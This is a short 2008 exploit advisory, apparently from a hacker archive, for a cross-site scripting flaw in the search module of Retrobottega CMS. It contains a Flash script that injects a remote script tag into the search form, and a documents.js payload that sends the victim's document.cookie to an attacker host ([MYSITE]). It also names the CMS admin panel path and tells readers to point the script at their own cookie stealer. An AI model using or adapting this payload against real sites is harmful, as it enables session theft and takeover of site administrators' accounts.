retrobottega-xss.txt
Posted on 15 March 2008
---------------------------------------------------------------------------------- | ___. .__.__ .__ __ __ | | ____ ___.__.\_ |__ ___________ _____ |__| | |__|/ |______ _____/ |_ | |_/ ___< | | | __ \_/ __ \_ __ / | | | | __\__ / __ | | \___\___ | | \_ ___/| | / Y Y | |_| || | / __ | | | | | \___ > ____| |___ /\___ >__| |__|_| /__|____/__||__| (____ /___| /__| | | // / / / / / | | | --------------------------------------------------------------------------------- Author: cybermilitant Site: www.hacktime.org Vendor's site: www.ilretrobottega.net E-Mail: cybermilitant.ht@gmail.com Vulnerability: Cross Site Sctipting (XXS) Description: Retrobottega cms is suschettible of a cross site scripting vulnerability. The search's module is vulnerable and you can inject a simple javascript for execute xss's attacks. You should only edit the script for redirecting on yours cookie stealer. --->Thanks to: nexen<--- Flash script: ------------------------------------------------------------------- var target:String = "art"; var lang:String = " it"; var nome_pagina:String = "RISULTATI_RICERCA"; var testo_da_ricercare:String = "<script src="http://[MYSITE]/documents.js"</script> "; var invia:String = "CERCA nel sito"; getURL("[TARGET]/trovato.php", "_self", "POST"); ------------------------------------------------------------------- documents.js ------------------------------------------------------------------- document.location='http://[MYSITE]/documents.php?c='+escape(document.cookie); ------------------------------------------------------------------- In the end the classical cookie grabber... the admininstrator board is here: http://[TARGET]/gestione/index.php
